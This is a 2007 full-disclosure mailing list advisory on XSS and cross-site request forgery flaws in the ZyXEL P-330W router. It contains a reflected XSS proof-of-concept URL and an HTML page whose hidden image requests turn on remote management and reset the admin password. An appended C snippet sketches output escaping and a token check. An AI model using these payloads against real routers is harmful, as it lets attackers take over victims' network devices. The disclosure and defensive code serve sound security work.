Re: [Full-disclosure] Ho Ho H0-Day - ZyXEL P-330W multiple XSS and XSRF

Subject: Re: [Full-disclosure] Ho Ho H0-Day - ZyXEL P-330W multiple XSS and XSRF vulnerabilities
Date: Thu, 27 Dec 2007 20:27:31 -0600
Also, because the router uses GoAhead 2.1.1 for its embedded web 
server, it is susceptible to all those vulnerabilities including 
CVE-2002-1951 (buffer overflow), CVE-2002-1603 (ASP source 
disclosure), and more.

-Santa

On Tue, 25 Dec 2007 13:31:20 -0600 Santa Clause 
<santa_clause@hush.com> wrote:
ZyXEL P-330W "Secure Wireless Internet Sharing Router" is
vulnerable to multiple XSS and XSRF attacks.

There are a plethora of XSS vulns in the web-based management
interface so I'll leave it to you to discover these gifts on your
own.  Here is a starting point:

http://<router_ip>:<router_port>/ping.asp?pingstr="><script>alert("Merry Christams")</script>

Additionally, no measures are taken to prevent XSRF so pretty much
the whole web-based interface is vulnerable.  Here is an example of
a web page that if loaded by the victim, turns on remote router
management on port 8080 and changes the admin password to
"santa_pw":

<html><head><title>Chirstmastime is Here</title></head><body>
<img src="http://<router_ip>:<router_port>/goform/formRmtMgt?webWanAccess=ON&remoteMgtPort=8080&pingWANEnabled=&upnpEnabled=&WANPassThru1=&WANPassThru2=&WANPassThru3=&submit-url=%2Fremotemgt.asp" width="0" height="0">
<img src="http://<router_ip>:<router_port>/goform/formPasswordSetup?username=admin&newpass=santa_pw&confpass=santa_pw&submit-url=%2Fstatus.asp&save=Save" width="0" height="0">
</body>
</html>

Of course, for any of these attacks to be successful the victim has
to be recently logged in to the router.

Hope everyone has a Merry Christmas and please don't think Santa is
a lamer because he posted XSS and XSRF (hey, I've been busy
delivering toys all night and needed a little pick-me-up).

Merry XSSmas, peace on earth, and this year, give the gift of input
validation.


-Santa Clause

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html

Hosted and sponsored by Secunia - http://secunia.com/
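
The two missing controls described in the message above (output encoding of the reflected pingstr value, and a check that state-changing /goform/ requests are deliberate), sketched in C as an added example. This is not code from the post, from GoAhead or from ZyXEL; the function names are hypothetical, and it assumes the firmware stores a random per-session token and embeds it in every form it serves.

```c
#include <stddef.h>
#include <string.h>

/* Escape src for HTML text and quoted-attribute contexts. Returns 0 on
 * success, -1 if dst (cap bytes) is too small; dst is always terminated. */
int html_escape(const char *src, char *dst, size_t cap)
{
    size_t o = 0;
    if (cap == 0) return -1;
    for (; *src; src++) {
        const char *rep = NULL;
        switch (*src) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        size_t n = rep ? strlen(rep) : 1;
        if (o + n >= cap) { dst[o] = '\0'; return -1; }
        if (rep) memcpy(dst + o, rep, n); else dst[o] = *src;
        o += n;
    }
    dst[o] = '\0';
    return 0;
}

/* Compare two tokens without stopping at the first mismatching byte. */
static int ct_equal(const char *a, const char *b)
{
    size_t la = strlen(a), lb = strlen(b);
    unsigned char diff = (unsigned char)(la != lb);
    for (size_t i = 0; i < la && i < lb; i++)
        diff |= (unsigned char)(a[i] ^ b[i]);
    return diff == 0;
}

/* Gate for state-changing /goform/ handlers (hypothetical hook): POST only,
 * and the request must carry the session's token from the served form. */
int goform_request_allowed(const char *method, const char *session_token,
                           const char *submitted_token)
{
    if (!method || strcmp(method, "POST") != 0) return 0;
    if (!session_token || !submitted_token || !*session_token) return 0;
    return ct_equal(session_token, submitted_token);
}
```

A request triggered by an <img> tag arrives as a GET without the token, so it fails both checks in goform_request_allowed.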
